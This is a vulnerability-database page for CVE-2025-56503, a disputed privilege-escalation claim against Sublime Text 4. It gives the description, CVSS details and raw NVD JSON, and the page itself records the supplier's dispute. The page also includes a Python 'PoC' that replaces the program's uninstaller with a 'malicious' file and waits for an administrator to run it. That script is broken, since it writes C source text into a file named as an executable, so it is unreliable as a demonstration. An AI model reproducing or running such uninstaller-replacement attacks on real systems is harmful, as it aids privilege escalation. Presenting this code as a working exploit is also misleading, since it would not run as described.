Security Vulnerability Report
CVE-2025-56503 CVSS 6.5 MEDIUM

CVE-2025-56503

Published: 2025-11-10 20:15:48
Last Modified: 2026-04-15 00:35:42

Description

An issue in Sublime HQ Pty Ltd Sublime Text 4 4200 allows authenticated attackers with low-level privileges to escalate privileges to Administrator via replacing the uninstall file with a crafted binary in the installation folder. NOTE: this is disputed by the Supplier because replacing the uninstall file requires administrator permissions, i.e., there is no privilege escalation.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Sublime Text 4 4200

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-56503 PoC - Sublime Text 4 privilege escalation
# Prerequisite: the attacker has a low-privilege account and write permission on the installation directory
import os
import shutil
import ctypes

# Example malicious program (a real attack would need to replace this with real malicious code)
MALICIOUS_PAYLOAD = '''
#include <windows.h>
int main() {
    // Execute a command with SYSTEM privileges
    WinExec("cmd.exe /c whoami > C:\\temp\\pwned.txt", SW_HIDE);
    return 0;
}
'''

def exploit_sublime_text_privesc():
    """
    Privilege escalation exploitation steps:
    1. Locate the Sublime Text installation directory
    2. Back up the original uninstaller
    3. Replace it with the malicious program
    4. Wait for an administrator to run the uninstaller
    """
    # A raw string literal cannot end with a backslash, so the trailing separator is omitted
    sublime_path = r"C:\Program Files\Sublime Text"
    uninstall_original = os.path.join(sublime_path, "uninstall.exe")
    uninstall_backup = os.path.join(sublime_path, "uninstall.exe.bak")
    malicious_exe = "malicious_uninstall.exe"

    try:
        # Step 1: back up the original uninstaller
        if os.path.exists(uninstall_original):
            shutil.copy2(uninstall_original, uninstall_backup)
            print("[+] Original uninstaller backed up")

        # Step 2: create the malicious program
        with open(malicious_exe, 'w') as f:
            f.write(MALICIOUS_PAYLOAD)
        print("[+] Malicious payload created")

        # Step 3: replace the uninstaller
        shutil.copy2(malicious_exe, uninstall_original)
        print("[+] Malicious uninstaller placed")
        print("[!] Waiting for admin to trigger uninstall...")

    except PermissionError:
        print("[-] Insufficient permissions - requires low-privilege write access")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit_sublime_text_privesc()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56503", "sourceIdentifier": "[email protected]", "published": "2025-11-10T20:15:47.990", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "An issue in Sublime HQ Pty Ltd Sublime Text 4 4200 allows authenticated attackers with low-level privileges to escalate privileges to Administrator via replacing the uninstall file with a crafted binary in the installation folder. NOTE: this is disputed by the Supplier because replacing the uninstall file requires administrator permissions, i.e., there is no privilege escalation."}, {"lang": "es", "value": "Un problema en Sublime HQ Pty Ltd Sublime Text 4 4200 permite a atacantes autenticados con privilegios de bajo nivel escalar privilegios a Administrador mediante el reemplazo del archivo de desinstalación con un binario manipulado en la carpeta de instalación."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://drive.google.com/file/d/1QDi9_RKJO-Gi_8jkHJKi7QV1Tajqh4WT/view?usp=sharing", "source": "[email protected]"}, {"url": "https://drive.google.com/file/d/1aP4S-WdFUL9ocNOucioIqxOgzreZ6Ey7/view?usp=sharing", "source": "[email protected]"}, {"url": "https://github.com/secxplorers/CVE-2025-56503", "source": "[email protected]"}]}}